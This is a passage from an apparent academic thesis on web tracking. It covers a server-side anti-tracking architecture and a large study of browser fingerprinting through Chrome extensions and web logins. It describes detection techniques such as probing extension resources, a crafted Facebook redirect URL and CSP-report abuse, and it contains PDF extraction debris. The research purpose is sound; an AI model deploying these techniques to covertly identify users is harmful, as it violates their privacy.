var third_party =document.getElementsByTagName("a") [ 0 ];

if ( w i nd o w. t op = = w in d ow . se l f ){

third_party.target ="_blank";

third_party.click();

window.close();

}else{

var iframe =document.createElement(" iframe") ;

iframe.name ="iframetarget";

document.body.appendChild(iframe);

third_party.target ="iframetarget";

third_party.click();

}

PUT(0,-845.90042)

5. EVALUATION AND CASE STUDY 115

Overall, when this response is rendered, the browser will not send the Referer header

to the third party, and the third party is prevented from communicating with in-context

content, as explained in Section 3.2.

4.1 Discussion and limitations

Our approach suffers from the following limitations. First, while our implementation

prevents cross-context and in-context contents from communicating with each other us-

ing postMessage API, in-context third party script can however identify the website a

user visits via document.location.href API. The script can include the website URL,

say http://main.com, as a parameter of the URL of a third party iframe, for example

http://third.com/page.html?ref=http://main.com and dynamically embed it in the

webpage. In our architecture, this URL is rewritten and routed to the Middle Party.

Since, the Middle Party Server does not inspect URL parameters, this information will

reach the third party even though the Referer is not sent with cross-context requests.

Another limitation is that of dynamic CSS changes. For instance, changing the background

image via the style object of an element in the webpage is not captured by the dynamic

rewriting script injected in webpages. Therefore, if the image was a third party image, the

CSP will prevent it from loading.

Performance overhead There is a performance cost associated with the Rewrite Server,

which can be evaluated as the cost of introducing any reverse proxy to a web application

architecture (See Section 3.1). Rewriting contents server-side and browser-side is also

expensive in terms of performance. We believe that server-side caching mechanisms, in

particular for static webpages, may help speed up the responsiveness of the Rewrite Server.

The Middle Party Server may also lead to performance overhead especially for webpages

with numerous third party contents. Therefore, it can be provided as a service by a trusted

external party, as it is the case for Content Distribution Networks (CDNs) serving contents

for many websites.

Extension to stateless tracking Even though this work did not address stateless track-

ing such as device fingerprinting, our architecture already hides several fingerprintable

device properties and can be extended to several others: 1) The redirection to the Middle

Party anonymizes the real IP addresses of users; 2) Some stateless tracking APIs such

as window.navigator,window.screen, and HTMLCanvasElement can be easily removed or

randomized from the context of the webpage to mitigate in-context fingerprinting.

Possibility of blocking active user recognition in cross-context. With the preva-

lence of third party tracking on the web, we have shown the challenges that a developer

will face towards mitigating that. The sandbox attribute for iframes help prevent access

to security-sensitive APIs. As tracking has become a hot concern, we suggest that sim-

ilar mechanisms can help first party websites tackle third party tracking. The sandbox

attribute can for instance be extended with specific values to tackle tracking. Nonetheless,

the sandbox attribute can be used to prevent cross-context from some stateful tracking

mechanisms [76].

5 Evaluation and Case Study

Demo website We have set up a demo website that embeds a collection of third party

content, both in-context and cross-context. In-context content include images, HTML5

audio and video, and a Google Map which further loads dynamic content such as images,

fonts, scripts, and CSS files. A Youtube video is embedded as cross-context content in an

PUT(0,-845.90042)

116 CHAPTER 6. SERVER-SIDE TRACKING PROTECTION

iframe. The demo website is deployed at https://sstp-rewriteproxy.inria.fr. With

the deployment of our solution, there is no change from a user perspective on how the demo

website is accessed. Indeed, it is still accessible at https://sstp-rewriteproxy.inria.fr.

However from the server-side, it is the Rewrite Server which is now running at https:

//sstp-rewriteproxy.inria.fr instead of the original server. It then intercepts user

requests and forwards them to the original server which has been moved on port 8080

(http://sstp-rewriteproxy.inria.fr:8080), hidden from users and the outside.

The Middle Party Server runs at https://sstp-middleparty.inria.fr. With our archi-

tecture deployed, all requests to fetch third party content embedded in the demo website

are redirected to the Middle Party Server. For in-context content, it removes any tracking

information in the requests sent by the browser. Then it forwards the requests to the third

parties. Any tracking information set by the third parties in the responses are also removed

before being forwarded to the browser. For the cross-context content (Youtube Video in

our demo), it is not directly loaded as an iframe inside the demo page. Instead, an iframe

from the Middle Party Server is created and embedded inside the demo webpage. Then

the Youtube video is automatically loaded in another iframe inside this first iframe whose

context is that of the Middle Party Server. During this process, the Referer header is not

leaked to Youtube (Section 3.2), preventing it from identifying the demo website in which

it is included.

Figure 6.5 – A demo page displaying a Google Maps

Figure 6.5 shows a screenshot of the redirection of third party requests to the Middle Party

Server.

Real websites. Since we did not have access to real websites, we could not install the

Rewrite Server and evaluate our solution on them. We therefore implemented a browser

proxy based on a Node.js proxy [106], and included all the logic of the Rewrite Server within

the proxy. The proxy was deployed at https://sstp-rewriteproxy.inria.fr:5555 and

PUT(0,-845.90042)

6. CONCLUSION 117

acts like the Rewrite Server for real websites intercepting and forwarding requests to them,

and rewriting the responses in order to redirect them to our Middle Party Server deployed

at https://sstp-middleparty.inria.fr.

We then evaluated our solution on different kinds of websites: a news website http://

www.bbc.com, an entertainment website http://www.imdb.com, and a shopping website

http://verbaudet.fr. All three websites load content from various third party domains.

Visually, we did not notice any change in the behaviors of the websites. We also interacted

with them in a standard way (clicking on links on a news website, choosing products and

putting them in the basket on the shopping website) and the main functionalities of the

websites were preserved.

Overall, these evaluation scenarios have helped us improve the solution, especially rewriting

dynamically injected third party content. We believe that this implementation will get even

mature in the future when we will be able to convince some website owners to deploy it.

Limitations of the evaluation on real websites.

The evaluation on the real websites may break some features of the website or introduce

performance issues. Here, we discuss such problems and how to prevent them.

Third party identity (OpenID) providers such as Facebook or Google need to use third

party cookies in order to authenticate users to third party websites. Therefore, stripping

off cookies can prevent users from successfully logging in to the related websites. In a

deployment scenario, we make it possible for the developer to instruct the Rewrite Server

not to rewrite such third party identity provider content so that users can still log in.

Furthermore, it is common for websites to rely on Content Distribution Networks (CDNs),

from which they load content for performance purposes. Therefore, rewriting and redirect-

ing CDNs requests to the Middle Party Server can introduce performance issues. In this

case also, a developer can declare a list of CDNs whose requests should not be rewritten

by the Rewrite Server.

Finally, as one may have noticed, the real websites we have considered in our evaluation

scenario are all HTTP websites. We could not evaluate our solution on real HTTPS

websites because HTTPS requests and responses that arrive at the browser proxy are

encrypted. Therefore, we could not rewrite third party content that are embedded in such

websites.

6 Conclusion

Most of the previous research analyzed third party tracking mechanisms, and how to block

tracking from a user perspective. In this chapter, we classified third party tracking capa-

bilities from a website developer perspective. We proposed a new architecture for website

developers that allows to embed third party content while preserving users’ privacy. We

implemented our solution, and evaluated it on real websites to mitigate stateful tracking.

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Chapter 7

Browser fingerprinting based on extensions and web

logins

Preamble

This chapter presents browser fingerprinting based on the browser extensions a user installs

and the websites she is logged into. The content of this chapter are replicated from the

paper title "To Extend or not to Extend: on the Uniqueness of Browser Extensions and

Web Logins" that has been published in the proceedings of the 2018 Workshop on Privacy

in the Electronic Society (WPES’18). It has been done in collaboration with other authors

from Inria.

1 Introduction

In the last decades, researchers have been actively studying users’ uniqueness in vari-

ous fields, in particular biometrics and privacy communities hand-in-hand analyze various

characteristics of people, their behavior and the systems they are using. Related research

showed that a person can be characterized based on her typing behavior [243,279], mouse

dynamics [239], and interaction with websites [190]. Furthermore, Internet and mobile

devices provide rich environment where users’ habits and preferences can be automati-

cally detected. Prior works showed that users can be uniquely identified based on websites

they visit [231], smartphone apps they install [166] and mobile traces they leave behind

them [183].

Since the web browser is the tool people use to navigate through the Web, privacy research

community has studied various forms of browser fingerprinting [165,180,185,188,191,

230]. Researchers have shown that a user’s browser has a number of “physical” characteris-

tics that can be used to uniquely identify her browser and hence to track it across the Web.

Fingerprinting of users’ devices is similar to physical biometric traits of people, where only

physical characteristics are studied.

Similar to previous demonstrations of user uniqueness based on their behavior [166,231],

behavioral characteristics, such as browser settings and the way people use their

browsers can also help to uniquely identify Web users. For example, a user installs web

browser extensions she prefers, such as AdBlock [6], LastPass [86] or Ghostery [61] to

enrich her Web experience. Also, while browsing the Web, she logs into her favorite social

networks, such as Gmail [66], Facebook [53] or LinkedIn [90]. In this work, we study users’

uniqueness based on their behavior and preferences on the Web: we analyze how unique

are Web users based on their browser extensions and logins.

119

PUT(0,-845.90042)

120 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

In recent works, Sjösten et al. [249] and Starov and Nikiforakis [260] explored two com-

plementary techniques to detect extensions. Sánchez-Rola et al. [245] then discovered

how to detect any extension via a timing side channel attack. These works were fo-

cused on the technical mechanisms to detect extensions, but what was not studied is

how browser extensions contribute to uniqueness of users at large scale. Li-

nus [223] showed that some social websites are vulnerable to the “login-leak” attack that

allows an arbitrary script to detect whether a user is logged into a vulnerable website. How-

ever, it was not studied whether Web logins can also contribute to users’ uniqueness.

In this work, we performed the first large-scale study of user uniqueness based on browser

extensions and Web logins, collected from more than 16,000 users who visited our website

(see the breakdown in Fig. 7.6). Our experimental website identifies installed Google

Chrome [62] extensions via Web Accessible Resources [249], and detects websites where the

user is logged into, by methods that rely on URL redirection and CSP violation reports.

Our website is able to detect the presence of 13k Chrome extensions on average per month

(the number of detected extensions varied monthly between 12,164 and 13,931), covering

approximately 28% of all free Chrome extensions1. We also detect whether the user is

connected to one or more of 60 different websites. Our main contributions are:

— A large scale study on how unique users are based on their browser extensions

and website logins. We discovered that 54.86% of users that have installed at least

one detectable extension are unique; 19.53% of users are unique among those who

have logged into one or more detectable websites; and 89.23% are unique among users

with at least one extension and one login. Moreover, we discover that 22.98% of users

could be uniquely identified by Web logins, even if they disable JavaScript.

— We study the privacy dilemma on Adblock and privacy extensions, that is, how well

these extensions protect their users against trackers and how they also

contribute to uniqueness. We evaluate the statement “the more privacy exten-

sions you install, the more unique you are” by analyzing how users’ uniqueness in-

creases with the number of privacy extensions they install; and by evaluating the

tradeoff between the privacy gain of the blocking extensions such as Ghostery [61]

and Privacy Badger [117].

We furthermore show that browser extensions and Web logins can be exploited to finger-

print and track users by only checking a limited number of extensions and Web logins.

We have applied an advanced fingerprinting algorithm [197] that carefully selects a limited

number of extensions and logins. For example, Figure 7.1 shows the uniqueness of users

we achieve by testing a limited number of extensions. The last column shows that 54.86%

of users are unique based on all 16,743 detectable extensions. However, by testing 485

carefully chosen extensions we can identify more than 53.96% of users. Besides, detecting

485 extensions takes only 625ms.

Finally, we give suggestions to the end users as well as website owners and browser vendors

on how to protect the users from the fingerprinting based on extensions and logins.

In our study we did not have enough data to make any claims about the stability of the

browser extensions and web logins because only few users repeated an experiment on our

website (to be precise, only 66 users out of 16,393 users have made more than 4 tests on

our website). We leave this as a future work.

1. The list of detected extensions and websites are available on our website: https://extensions.

inrialpes.fr/faq.php

PUT(0,-845.90042)

2. BACKGROUND 121

Figure 7.1 – Results of general fingerprinting algorithm. Testing 485 carefully selected

extensions provides a very similar uniqueness result to testing all 16,743 extensions. Almost

unique means that there are 2–5 users with the same fingerprint.

2 Background

2.1 Detection of browser extensions

In the Google Chrome web browser, each extension comes with a manifest file [64],

which contains metadata about the extension. Each extension has a unique and per-

manent identifier, and the manifest file of an extension with identifier extID is located

at chrome-extension://[extID]/manifest.json. The manifest file has a section called

web_accessible_resources (WARs) that declares which resources of an extension are ac-

cessible in the content of any webpage [63]. The WARs section specifies a list of paths to

such resources, presented by the following type of URL:

chrome-extension://[extID]/[path], where path is the path to the resource in the ex-

tension.

Therefore, a script that tries to load such an accessible resource in the context of an

arbitrary webpage is able to check whether an extension is installed with a 100% guarantee:

if the resource is loaded, an extension is installed, otherwise it is not. Figure 7.2 shows

an example of AdBlock extension detection: the script tries to load an image, which is

declared in the web_accessible_resources section of AdBlock’s manifest file. If the

image from AdBlock, located at chrome-extension://[AdBlockID]/icons/icons24.png

is successfully loaded, then AdBlock is installed in the user’s browser.

Sjösten et al. [249] were the first to crawl the Google Chrome Web Store and to discover

that 28% of all free Chrome extensions are detectable by WARs. An alternative method to

detect extensions that was available at the beginning of our experiment, was a behavioral

method from XHOUND [260], but it had a number of false positives and detected only 9.2%

of top 10k extensions . Therefore, we decided to reuse the code from Sjösten et al. [249]

with their permission to crawl Chrome Web Store and identify detectable extensions based

on WARs. During our experiment, we discovered that WARs could be detected in other

PUT(0,-845.90042)

122 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

Figure 7.2 – Detection of browser extensions and Web logins. A user visits a benign

website test.com which embeds third party code (the attacker’ script) from attacker.com.

The script detects an icon of Adblock extension and concludes that Adblock is installed.

Then the script detects that the user is logged into Facebook when it successfully loads

Facebook favicon.ico. It also detects that the user is logged into LinkdedIn through a

CSP violation report triggered because of a redirection from https://fr.linkedin.com

to https://www.linkedin.com. All the detection of extensions and logins are invisible to

the user.

Chromium-based browsers like Opera [109] and the Brave Browser [16] (we could even

detect Brave Browser since it is shipped with several default extensions detectable by

WARs). We have chosen to work with Chrome, as it was the most affected.

2.2 Detection of web logins

In general, a website cannot detect whether a user is logged into other websites because of

Web browser security mechanisms, such as access control and Same-Origin Policy [125]. In

this section, we present two advanced methods that, despite browser security mechanisms,

allow an attacker to detect the websites where the user is logged into. Figure 7.2 presents

all the detection mechanisms.

Redirection URL hijacking. The first requirement for this method to work is the login

redirection mechanism: when a user is not logged into Facebook, and tries to access an

internal Facebook resource, she automatically gets redirected to the URL http://www.

facebook.com/login.php?next=[path], where path is the path to the resource. The

second requirement is that the website should have an internal image available to all the

users. In the case of Facebook, it is a favicon.ico image.

By dynamically embedding an image pointing to https://www.facebook.com/login.php?

next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico into the webpage, an attacker

can detect whether the user is logged into Facebook or not. If the image loads, then

the user is logged into Facebook, otherwise she is not. This method has been shown to

successfully detect logins on dozens of websites [223].

Abusing CSP violation reporting.

An attacker can misuse CSP to detect redirections [206]. We extend this idea to detect

logins. For this method to work, a website should redirect its logged in users to a different

domain. In the case of LinkedIn, the users, who are not logged in, visit fr.linkedin.com,

PUT(0,-845.90042)

3. DATASET 123

while the users, who are logged in, are automatically redirected to a different domain

www.linkedin.com. The lowest block of Fig. 7.2 presents an example of such attack on

LinkedIn. Initially, the attacker embeds a hidden iframe from his own domain with the CSP

that restricts loading images only from fr.linkedin.com. Then, the attacker dynamically

embeds a new image on the testing website, pointing to fr.linkedin.com. If the user is

logged in, LinkedIn will redirect her to the www.linkedin.com, and thus the browser will

fire a CSP violation report because images can be loaded only from fr.linkedin.com. By

receiving the CSP report, the attacker deduces that the user is logged in LinkedIn.

3 Dataset

We launched an experiment website in April 2017 to collect browser extensions and Web

logins with the goal of studying users’ uniqueness at a large scale. We have advertised our

experiment by all possible means, including social media and in press. In this section, we

first present the set of attributes that we collect in our experiment and the rules we applied

to filter out irrelevant records. Then, we provide data statistics and show which extensions

and logins are popular among our users.

3.1 Experiment website and data collection

The goal of our website is both to collect browser extensions and Web logins, and to inform

users about privacy implications of this particular type of fingerprinting. Using the various

detection techniques described in Section 2, we collect the following attributes:

— The list of installed browser extensions, using web accessible resources. For each user

we tested around 13k extensions detectable at the moment of testing (see Figure 7.3).

— The list of Web logins: we test for 44 logins using redirection URL hijacking and 16

logins using CSP violation report.

— Standard fingerprinting attributes [221], such as fonts installed, Canvas fingerprint [164],

and WebGL [227]. To collect these attributes, we use FingerprintJS2, which is an

open-source browser fingerprinting library [199]. We collected these attributes in

order to clean our data and compare entropy with other studies (see Table 7.3).

To recognize users that perform several tests on our website, we have stored a unique

identifier for each user in the HTML5 localStorage. We have communicated our website

via forums and social media channels related to science and technology, and got press

coverage in 3 newspapers. We have collected 22,904 experiments performed by 19,814

users between April and August 2017.

Ethical concerns. Our study was validated by an IRB-equivalent service at our institu-

tion. All visitors are informed of our goal, and are provided with both Privacy Policy and

FAQ sections of the website. The visitors have to explicitly click on a button to trigger the

collection of their browser attributes. In our Privacy Policy, we explain what data we are

collecting, and give a possibility to opt-out of our experiment. The data collected is used

only for our own research, will be held until December 2019 and will not be shared with

anyone.

Data cleaning. We applied a set of cleaning rules over our initial data, to improve

the quality of the data. The final dataset contains 16,393 valid experiments (one per

user). Table 7.1 shows the initial number of users and which users have been removed

from our initial dataset. We have removed all 1,042 users with mobile browsers. At the

time of writing this thesis, browser extensions were not supported on Chrome for mobiles.

PUT(0,-845.90042)

124 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

Initial users 19,814

Mobile browser users 1,042

Chrome browser users with extension detection error 6

Non Chrome users with at least one extension detected 261

Brave browser users 31

Users whose browser has an empty user-agent string, screen resolution,

fonts, or canvas fingerprint

2,015

Users with more than 4 experiments 66

Final dataset 16,393

Chrome browser users in the final dataset 7,643

Table 7.1 – Users filtered out of the final dataset

Since extensions detection were designed for Chrome, we then excluded mobile browsers.

Moreover, mobile users tend to prefer native apps rather than their web versions 2. In fact,

the popular logins in our dataset, such as Gmail, Facebook, Youtube, all have a native

mobile version.

We have also removed 2,015 users that have deliberately tampered with their browsers:

for example, users with empty user-agent string, empty screen resolution or canvas finger-

print. We think that it is reasonable not to trust information received from those users, as

they may have tampered with it. We also needed this information to compare our study

with previous works on browser fingerprinting. Finally, we have excluded users who have

tampered with extension detection. This includes Chrome users for whom extension de-

tection did not successfully complete, and users of other browsers with at least 1 extension

detected.

For users who visited our website and performed up to 4 experiments, we kept only one

experiment, the one with the biggest number of extensions and logins. We then removed 66

users with more than 4 experiments. We suspect that the goal of such users with numerous

experiments was just to use our website in order to test the uniqueness of their browsers

with different browser settings.

Figure 7.3 – Evolution of detected extensions in Chrome

2. https://jmango360.com/wiki/mobile-app-vs-mobile- website-statistics/

PUT(0,-845.90042)

3. DATASET 125

Evolution of browser extensions. From November 2016 to July 2017, we crawled on

a monthly basis the free extensions on the Chrome Web Store in order to keep an up-to-

date set of extensions for our experiment. Figure 7.3 presents the evolution of extensions

throughout the period of our experiment. Since some extensions got removed from the

Chrome Web Store, the number of stable extensions decreased.

Out of 12,164 extensions that were detectable in November 2016, 8,810 extensions (72.4%)

remained stable throughout the 9-months-long experiment. In total, 16,743 extensions were

detected at some point during these 9 months. Since every month the number of detectable

extensions was different, on average we have tested around 13k extensions during each

month.

3.2 Data statistics

Our study is the first to analyze uniqueness of users based on their browser extensions

and logins at large scale. Only uniqueness based on browser extensions was previously

measured, but on very small datasets of 204 [245] and 854 [260] participants. We measure

uniqueness of 16,393 users for all attributes, and of 7,643 Chrome browser users for browser

extensions.

Comparison to previous studies. To compare our findings with the previous works

on browser extensions, we randomly pick subsets of 204 (as in [245]) and 854 (as in [260])

Chrome users 100 times (we found that picking 100 times provided a stable result). Ta-

ble 7.2 shows uniqueness results from previous works and an estimated uniqueness using

our dataset.

Table 7.2 – Previous studies on measuring uniqueness based on browser extensions and our

estimation of uniqueness.

Study Fingerprints col-

lected in a study

Extensions tar-

geted in a study

Unique fin-

gerprints in a

study

Unique finger-

prints in our

dataset

Timing

leaks [245]

204 2,000 56.86% 55.64%

XHOUND

[260]

854 1,656 14.10% 49.60%

Ours 7,643 13k 39.29% 39.29%

The last column in Table 7.2 shows our evaluation of uniqueness for a given subset of

users. Our estimation for 204 random users is 55.64%, which is close to the 56.86% from

the original study [245]. For 854 random users, we estimate that 49.60% of them are

unique, while in the original XHOUND study [260] the percentage of unique users is only

14.1%. We think that such small percentage of unique users in [260] is due to (1) a smaller

number of extensions detected (only 174 extensions were detected for 854 users); (2) a

different user base: while our experiments and [245] targeted colleagues, students and

other likely privacy-aware experts, XHOUND [260] used Amazon Mechanical Turk, where

users probably have different habits to installing extensions. Out of 7,643 users of the

Chrome browser, where we detected extensions, 39.29% of users were unique. This number

shows a more realistic estimation of users’ uniqueness based on browser extensions than

previous works because of a significantly larger dataset.

To the best of our knowledge, our study is the first to analyze uniqueness of users

based on their web logins, and on combination of extensions and logins.

PUT(0,-845.90042)

126 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

Normalized Shannon’s entropy. We compare our dataset with the previous studies

on browser fingerprinting: AmIUnique [218, Table B.3] (contains 390,410 fingerprints, col-

lected between November 2014 and June 2017) and Hiding in the Crowd [191] (contains

1,816,776 users collected in 2017). Entropy measures the amount of identifying information

in a fingerprint – the higher the entropy is, the more unique and identifiable a fingerprint

will be. To compare with previous datasets, which are of different sizes, we compute

normalized Shannon’s entropy:

HN(X) = H(X)

log2N=−1

log2N·X

P(xi) log2P(xi)(7.1)

where Xis a discrete random variable with possible values {x1, ..., xn},P(X)is a proba-

bility mass function and Nis the size of the dataset.

Table 7.3 compares the entropy values of well-known attributes for standard fingerprinting

and for logins for all 16,393 users in our dataset and for browser extensions for 7,643 Chrome

users. All the attributes in standard fingerprinting are similar to previous works, except

for fonts and plugins. Unsurprisingly, plugins entropy is very small because of decreasing

support of plugins in Firefox [237] and Chrome [246]. Differently from previous studies

that detected fonts with Flash, we used JavaScript based font detection, relying on a list

of 500 fonts shipped along with the FingerprintJS2 library. As those fonts are selected for

fingerprinting, this could explain why our list of fonts provides a very high entropy.

Table 7.3 – Normalized entropy of extensions and logins compared to previous studies.

Standard fingerprinting studies

Attribute Ours AmIUnique [218] Hiding [191]

Desktop

User Agent 0.474 0.601 0.304

List of Plugins 0.343 0.523 0.494

Timezone 0.168 0.187 0.005

Screen Resolution 0.271 0.276 0.213

List of Fonts 0.652 0.370 0.335

Canvas 0.611 0.503 0.387

Studies on extensions and logins

Attribute Ours Timing leaks [245] XHOUND [260]

Extensions 0.641 0.869 0.437

Logins 0.441 N/A N/A

In our dataset, as well as in previous studies, browser extensions are one of the most discrim-

inating attributes of a user’s browser. The computed entropy of 0.641, computed for the

7,643 Chrome users, lays between the findings of Timing leaks [245] and XHOUND [260].

One possible explanation is the size of the user base. For instance, users in XHOUND had

few and probably often the same extensions detected (out of 1,656 targeted extensions,

only 174 were detected for 854 users), making only 14.1% of them unique. This explains

why the entropy in XHOUND is smaller. Sánchez-Rola et al. [245] computed a very high

entropy, but on a very small dataset of 204 users: 116 of them had a unique set of installed

extensions, and thus the computed entropy was very high.

PUT(0,-845.90042)

3. DATASET 127

Figure 7.4 – Usage of browser extensions and logins by all users.

3.3 Usage of extensions and logins

Figure 7.4 shows the distribution of users in our dataset according to the number of detected

extensions and logins (users having between 1 and 13 logins or extensions detected), and the

number of unique users as they are grouped by number of detected extensions and logins.

The maximum number of extensions we detected for a single user was 33. The number

of users decreases with the number of extensions. The largest group of users have only 1

extension detected, followed by users with 2 detected extensions, etc. We notice that the

more extensions a user has, the more unique she is. We analyze this phenomenon further

in Section 4.2. Among users with exactly 1 extension detected, 7.39% are unique. This

percentage rises to 45.35% and 85.89% for groups of users with exactly 2 and 3 detected

extensions respectively.

Figure 7.4 also shows the distribution of users per number of detected logins. We found that

most users have between 1 and 10 logins, with a maximum number of 40 logins detected

for one user. On our website, we were able to detect the presence of 60 logins, which is

rather small with respect to the large number of extensions we tested (around 13k per

user). This explains why fewer users are unique based on their logins: for example, among

users with exactly 1 login detected, 0.10% are unique, and 7.82% are unique among users

with exactly 2 logins detected.

Table 7.4 – Top seven most popular extensions in our dataset and their popularity on

Chrome Web Store

Extension Dataset Chrome

AdBlock 1,557 10,000,000+

LastPass: Free Password Manager 1,081 7,297,730

Ghostery 735 2,665,427

Privacy Badger 594 771,804

Adobe Acrobat 585 10,000,000+

Cisco WebEx Extension 482 10,000,000+

Save to Pocket 428 2,752,642

What extensions are the most popular among our users? Table 7.4 presents

the seven most detected extensions in our dataset of 16,393 users. The three most pop-

ular extensions are AdBlock [6], password manager LastPass [86] and tracker blocker

Ghostery [61]. These extensions are also very popular according to their downloads statis-

tics on Chrome Web Store.

What websites users are logging into the most? Table 7.5 shows the seven most

detected websites in our experiment. These websites are also highly rated according to

PUT(0,-845.90042)

128 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

Table 7.5 – Top seven most popular logins in our dataset and their ranking according to

Alexa

Website Dataset Alexa Rank

Gmail (subdomain of Google) 6,828 1

Youtube 6,780 2

Facebook 5,493 3

LinkedIn 3,913 13

Blogger 3,393 53

Twitter 3,274 8

eBay.com 2,220 33

Alexa 3. For instance, Google [65], Facebook [53] and Youtube [157] are regularly ranked

as the top 3 most popular websites by Alexa 4. Being able to detect such popular websites

further strengthen our study as they represent websites that are widely used by users in

the wild.

4 Uniqueness analysis

In this section we present the results for user’s uniqueness based on all 16,743 extensions

and 60 logins. We first show uniqueness for the full dataset of 16,393 users, and then

present more specific results for various subsets of our dataset.

Figure 7.5 – Distribution of anonymity set sizes for 16,393 users based on detected exten-

sions and logins.

Uniqueness results for the full dataset. Figure 7.5 shows the uniqueness of users

according to their extensions and logins, and a combination of both attributes. Out of the

16,393 users, 11.30% are unique based on their logins. For 42.1% of users in our dataset,

we did not detect any logins. These users either did not log into any of the 60 websites

we could detect or blocked third party cookies, that prevented our login detection from

working properly.

Considering only detected extensions, 18.38% of users in our dataset are unique. This

result is also influenced by the 66.61% of users who did not have any extension detected:

these are either Chrome users with no extensions detected, or users of other browsers.

An attacker willing to fingerprint users can also use their detected logins and extensions

combined. Interestingly, by combining extensions and logins, we found that 34.51% of users

3. Alexa ranking extracted on the the 28th of June 2018

4. Note that Gmail is a subdomain of Google, that is why it is ranked 1 in Table 7.5.

PUT(0,-845.90042)

4. UNIQUENESS ANALYSIS 129

are uniquely identifiable. It is worth mentioning that 32.61% of users have no extensions

and no logins detected. This impacts significantly the computed uniqueness.

4.1 Four final datasets

Figure 7.6 – Four final datasets. DExt contains users, who have installed at least one

detected extension and DLog contains users, who have at least one login detected.

In our full dataset of 16,393 users, we have observed 7,643 users of Chrome browser, for

whom testing of browser extensions worked properly. In this subsection we consider various

subsets of our full dataset that demonstrate uniqueness results for users who have at least

one extension or one login detected. Figure 7.6 shows four final datasets that we further

analyze in this section:

—DExt contains 5,474 Chrome users, who have installed at least one extension that we

can detect.

—DLog contains 9,492 users, who have logged into at least one website that we detect.

—DExt ∩DLog contains 3,919 Chrome users who have at least one extension and one

—DExt ∪DLog contains 11,047 users who have either at least one extension or at least

one login detected.

4.2 Uniqueness results for final datasets

Figure 7.7 presents results for the four datasets. DExt dataset shows that 54.86% of users

are uniquely identifiable among Chrome users, who have at least one detectable exten-

sion. This demonstrates that browser extensions detection is a serious privacy threat as a

fingerprinting technique.

Among 9,492 users with at least one login detected (DLog dataset) only 19.53% are uniquely

identifiable. This result can be explained by a very small diversity of attributes (only 60

websites).

When we analyzed Chrome users who have at least one extension and one login detected

(DExt ∩DLog dataset), we found out that 89.23% of them are uniquely identifiable. This

means that without any other fingerprinting attributes, the mere installation of at least

one extension, in addition to being logged into at least one website imply that the majority

PUT(0,-845.90042)

130 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

Figure 7.7 – Anonymity sets for different datasets

of users in this dataset can be tracked by their fingerprint based solely on extensions and

logins!

Furthermore, for dataset DExt ∪DLog that contains users with at least one extension or at

least one login, we compute that 51.15% of users can be uniquely identified. This result

becomes particularly interesting when we compare the size of the DExt ∪DLog dataset,

which contains 11,047 users, with the size of the DExt dataset, that has 5,474 users. The

size of DExt ∪DLog is almost twice as large as DExt . Nevertheless, the percentage of unique

users and the distribution of anonymity set sizes in these datasets are very similar: 54.86%

of unique users in DExt and 51.15% of unique users in DExt ∪DLog . We believe this is due

to the fact that extensions and logins are orthogonal properties. We checked the cosine

similarity between these attributes as binary vectors, and found that all attribute pairs

had a very low similarity score, all below 0.34, with 11 exceptions below 0.2.

The last row DExt(Stable )shows uniqueness of users in the DExt dataset, but considering

only stable extensions (see more details in Section 3). Interestingly, 50.35% of users are

uniquely identifiable with their stable extensions only and the distribution of anonymity

set sizes is very similar too. This result shows that browser extensions that were added

or removed throughout the 9-months-long experiment do not influence the result of users’

uniqueness.

Figure 7.8 – Anonymity sets for users with respect to the number of detected extensions

The more extensions you install, the more unique you are. In the beginning of

this section, we have shown that 54.86% of users are unique among those who have at least

one extension detected (DExt dataset). Figure 7.8 shows how uniquely identifiable users

are when they have more extensions detected. Among users with at least two extensions

PUT(0,-845.90042)

5. FINGERPRINTING ATTACKS 131

detected, 76.25% are uniquely identifiable. This percentage rises quickly to 92.22% and

95.85% when we consider users with at least three and four extensions detected respectively.

We made a similar analysis for logins: likewise, the percentage of unique users grows if we

consider users with a higher number of detected logins. 31.58% users with at least 5 logins

are uniquely identifiable with their logins only. This percentage rises to 38.98% when we

detected at least 8 logins. Intuitively, the more extensions or logins a user has, the more

unique he becomes. It is worth mentioning that the subsets of users considered decreases

as we increase the number of extensions or logins detected, as shown in Figure 7.4.

Figure 7.9 – Anonymity sets when JavaScript is disabled

Uniqueness if JavaScript is disabled. Users might decide to protect themselves from

fingerprinting by disabling JavaScript in their browsers. However even when JavaScript is

disabled, detection of logins via a CSP violation attack still works. Among 60 websites in

our experiment, we discovered that such an attack works for 18 websites. Figure 7.9 shows

anonymity sets for 9,492 users of DLog dataset assuming users have disabled JavaScript.

By considering only logins detectable with CSP, 1.63% of users are uniquely identifiable,

and 4.10% are unique based on a user agent string that is sent with every request by the

browser. However, when we combine the user agent string with the list of logins detectable

with CSP, 22.98% of users become uniquely identifiable.

5 Fingerprinting attacks

According to the uniqueness analysis from Section 4, 54.86% of users that have installed

at least one detectable extension are unique; 19.53% of users are unique among those who

have logged into one or more detectable websites; and 89.23% are unique among users with

at least one extension and one login. Therefore, extensions and logins can be used to track

users across websites. In this section we present the threat model, discuss and evaluate

two algorithms that optimize fingerprinting based on extensions and logins.

5.1 Threat model

The primary attacker is an entity that wishes to uniquely identify a user’s browser across

websites. An attacker is recognizing the user by his browser fingerprint, a unique set of

detected browser extensions and Web logins (we call them attributes), without relying

on cookies or other stateful information. A single JavaScript library that is embedded

on a visited webpage can check what extensions and Web logins are present in the user’s

browser. By doing so, an attacker is able to uniquely identify the user and track her

activities across all websites where the attacker’s code is present. We assume that an

attacker has a dataset of users’ fingerprints, either previously collected by the attacker or

bought from data brokers.

PUT(0,-845.90042)

132 CHAPTER 7. BROWSER EXTENSIONS FINGERPRINTING

5.2 How to choose optimal attributes?

The most straightforward way to track a user via browser fingerprinting is to check all the

attributes (browser extensions and logins) of her browser. However, testing all 13k exten-

sions takes around 30 seconds5and thus may be unfeasible in practice. Therefore, the

number of tested attributes is one of the most important property of fingerprinting attacks

– the attack is faster when fewer attributes are checked. But testing fewer attributes may

lead to worse uniqueness results, because more users will share the same fingerprint.

While it was shown that finding the optimal fingerprint is an NP-hard problem [197],

finding approximate solutions is neither a trivial task. For example, choosing the most

popular attributes worked in the case of tracking based on Web history, but this strategy

